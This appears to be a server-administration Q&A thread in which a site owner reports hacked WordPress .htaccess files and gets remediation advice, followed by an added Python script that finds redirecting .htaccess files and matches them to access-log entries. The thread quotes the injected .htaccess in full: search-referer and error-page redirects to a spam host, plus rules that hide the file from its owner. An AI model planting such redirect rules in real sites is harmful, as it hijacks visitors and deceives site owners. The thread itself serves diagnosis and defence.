
Possible Duplicate:
My server's been hacked EMERGENCY

There seems to be a malicious script accessing my server and editing the .htaccess files for all of my hosted sites to redirect towards spam links.

What is the best way to stop this from happening?

I have changed my server access details, both for the control panel and the FTP access and tried updating the existing .htaccess files with the following code but it still appears to be changing.

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# Protect the htaccess file (this <files> block matches the literal name ".htaccess" only)
<files .htaccess>
order allow,deny
deny from all
</files>

# protect from sql injection
# (what these rules actually do: reject query strings carrying <script> tags or
# attempts to set GLOBALS/_REQUEST; they never see POST bodies or SQL)
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Is there anything else that would help?

Sorry for any lack of information, I'm fairly new to servers etc., so if there are any extra details needed, just shout out!

Thanks in advance for any help.

Dan

******* EDIT *******

The malicious .htaccess as requested

<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>

# STRONG HTACCESS PROTECTION
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 http://byidelement.ru/ruby/index.php
ErrorDocument 401 http://byidelement.ru/ruby/index.php
ErrorDocument 403 http://byidelement.ru/ruby/index.php
ErrorDocument 404 http://byidelement.ru/ruby/index.php
ErrorDocument 500 http://byidelement.ru/ruby/index.php
DanC
    Really, you should start by trying to determine how your server was breached, how much access the other person has, and how you can contain the damage. However, try to change the permissions on the .htaccess file - remove write permissions (`chmod -w .htaccess`), make it immutable `sudo chattr +i` (and, of course, ensure your webserver user can't `chmod`). You could even change the owner of the file - but it shouldn't be required. – cyberx86 Jan 08 '12 at 11:33
  • Thanks for the responses, I've changed the chmod to 0444 on all .htaccess files but have no real idea how to make it immutable or ensure my webserver cannot chmod! I'll have a fun Sunday figuring these out I'm sure! – DanC Jan 08 '12 at 11:51
  • Can you post the .htaccess files it's creating? Often these infections are known and with a quick Google their cure can be found. Also, run [chkrootkit](http://www.chkrootkit.org/) on there a bit quick. – SimonJGreen Jan 08 '12 at 11:58

1 Answer


Run chkrootkit on there a bit quick, just in case.

Make sure all the packages are up to date with security fixes:

  • Ubuntu/Debian: apt-get update; apt-get dist-upgrade
  • CentOS/Fedora/RHEL: yum upgrade

It's likely, though, that this is a known exploit in the version of WordPress (or some other off-the-shelf framework) you're running, and now that it's been discovered it's being remotely exploited again and again. If this is the case, search for the latest version of all frameworks you're running and check for security fixes.

Assuming it has been exploited remotely, this can be confirmed by getting a tail running on the web server access log(s) and watching for any suspicious activity. tail -f /var/log/apache2/access-log would be the command on a stock Ubuntu install, but all distros place their Apache logs in different places. When you see something suspicious you'll know which VirtualHost has been compromised. If you're feeling adventurous, scan through your historic access logs as well. This can be daunting on a high traffic server but will show the point of attack. Narrow down your search by searching around the time when you know the first attack took place.

SimonJGreen
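Two parts of this thread call for the same tooling: the injected .htaccess DanC posted (every RewriteRule and ErrorDocument points at byidelement.ru), and the answer's advice to comb the access log around the time the file changed. The script below is an added example written for this page, not code from the question, the answer or any project; it assumes Apache's "combined" LogFormat, stock WordPress paths, and entirely constructed sample data (two fake sites in a temp directory, an infection time set with os.utime, and invented log lines). It flags any .htaccess that redirects to a host you do not own, then lists suspicious PHP requests (PHP under wp-content/uploads, or POSTs to PHP files outside WordPress's core entry points) that landed in the minutes before that file's mtime, which is usually the request that wrote it.

```python
"""Added triage example (not from the original post): find .htaccess files that redirect
visitors off-site, then pull the access-log requests that arrived just before each file
was written.  All sample data is constructed; the redirect host is the one from the post."""
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone

# The injected file uses RewriteRule / ErrorDocument with an absolute URL as the target;
# WordPress's own rules only target local paths, so a foreign absolute URL is the tell.
OFFSITE_DIRECTIVE = re.compile(
    r'^\s*(?:RewriteRule\s+\S+|ErrorDocument\s+\d{3})\s+https?://([^\s/]+)',
    re.IGNORECASE | re.MULTILINE)
# Apache "combined" LogFormat (assumed; check the LogFormat line on the box).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Core PHP entry points that legitimately receive POSTs from the public.
KNOWN_POST_TARGETS = {'/wp-login.php', '/xmlrpc.php', '/wp-comments-post.php', '/wp-cron.php'}

def offsite_targets(htaccess_text, own_hosts=()):
    """Sorted list of foreign hosts this .htaccess sends visitors to."""
    own = {h.lower() for h in own_hosts}
    return sorted({m.group(1).lower() for m in OFFSITE_DIRECTIVE.finditer(htaccess_text)} - own)

def find_infected(root, own_hosts=()):
    """Walk root; return [(path, mtime as aware UTC datetime, [hosts])] for redirecting files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                hosts = offsite_targets(fh.read(), own_hosts)
            if hosts:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
                hits.append((path, mtime, hosts))
    return hits

def parse_line(line):
    """Parse one combined-format line into a dict (None if it does not match)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['time'] = datetime.strptime(entry['ts'], '%d/%b/%Y:%H:%M:%S %z')
    entry['path'] = entry['path'].split('?', 1)[0]   # drop the query string
    return entry

def is_suspicious(entry):
    """PHP running where it should not: under uploads, or taking POSTs off the core entry points."""
    path = entry['path']
    if path.endswith('.php') and '/wp-content/uploads/' in path:
        return True
    return (entry['method'] == 'POST' and path.endswith('.php')
            and not path.startswith('/wp-admin/') and path not in KNOWN_POST_TARGETS)

def correlate(infected, log_lines, before=timedelta(minutes=30), after=timedelta(minutes=1)):
    """For each infected .htaccess, the suspicious requests in [mtime - before, mtime + after]."""
    entries = [e for e in map(parse_line, log_lines) if e and is_suspicious(e)]
    report = {}
    for path, mtime, hosts in infected:
        hits = [e for e in entries if mtime - before <= e['time'] <= mtime + after]
        report[path] = {'hosts': hosts, 'mtime': mtime, 'requests': hits}
    return report

# ---- constructed demo data (not real traffic, not real files from the server) ----
MALICIOUS_HTACCESS = """<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>
ErrorDocument 404 http://byidelement.ru/ruby/index.php
"""
CLEAN_HTACCESS = "RewriteEngine On\nRewriteBase /\nRewriteRule . /index.php [L]\n"
INFECTION_TIME = datetime(2012, 1, 8, 3, 14, 9, tzinfo=timezone.utc)  # assumed write time
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jan/2012:03:02:41 +0000] "GET / HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [08/Jan/2012:03:13:55 +0000] "GET /wp-content/uploads/2011/12/img.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [08/Jan/2012:03:14:07 +0000] "POST /wp-content/uploads/2011/12/img.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jan/2012:03:15:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [08/Jan/2012:09:40:13 +0000] "POST /wp-content/plugins/old/upload.php HTTP/1.1" 200 77 "-" "curl/7.21"',
]

def demo():
    """Two sites in a temp dir, one infected with its mtime forced to INFECTION_TIME."""
    with tempfile.TemporaryDirectory() as root:
        for site, text in (('siteA', MALICIOUS_HTACCESS), ('siteB', CLEAN_HTACCESS)):
            d = os.path.join(root, site, 'public_html')
            os.makedirs(d)
            p = os.path.join(d, '.htaccess')
            with open(p, 'w') as fh:
                fh.write(text)
            if text == MALICIOUS_HTACCESS:
                os.utime(p, (INFECTION_TIME.timestamp(),) * 2)   # simulate the attacker's write
        report = correlate(find_infected(root, own_hosts=('example.com',)), SAMPLE_LOG)
        return {os.path.relpath(k, root).replace(os.sep, '/'): v for k, v in report.items()}
```

Calling demo() returns one entry, siteA/public_html/.htaccess, redirecting to byidelement.ru, with the two requests to /wp-content/uploads/2011/12/img.php from 198.51.100.9 that arrived seconds before the file's mtime; the later POST to a plugin file is flagged as suspicious but falls outside the window, so it is not attributed to that file. On a real box, point find_infected at the hosting root (pass your own domains as own_hosts so legitimate canonical-host redirects are not flagged) and feed correlate the lines of the relevant access log; widen `before` if the .htaccess was rewritten long after the shell was dropped. The heuristics are deliberately narrow and will not catch an attacker driving a vulnerable plugin file under wp-admin, so treat an empty window as "look harder", not "clean".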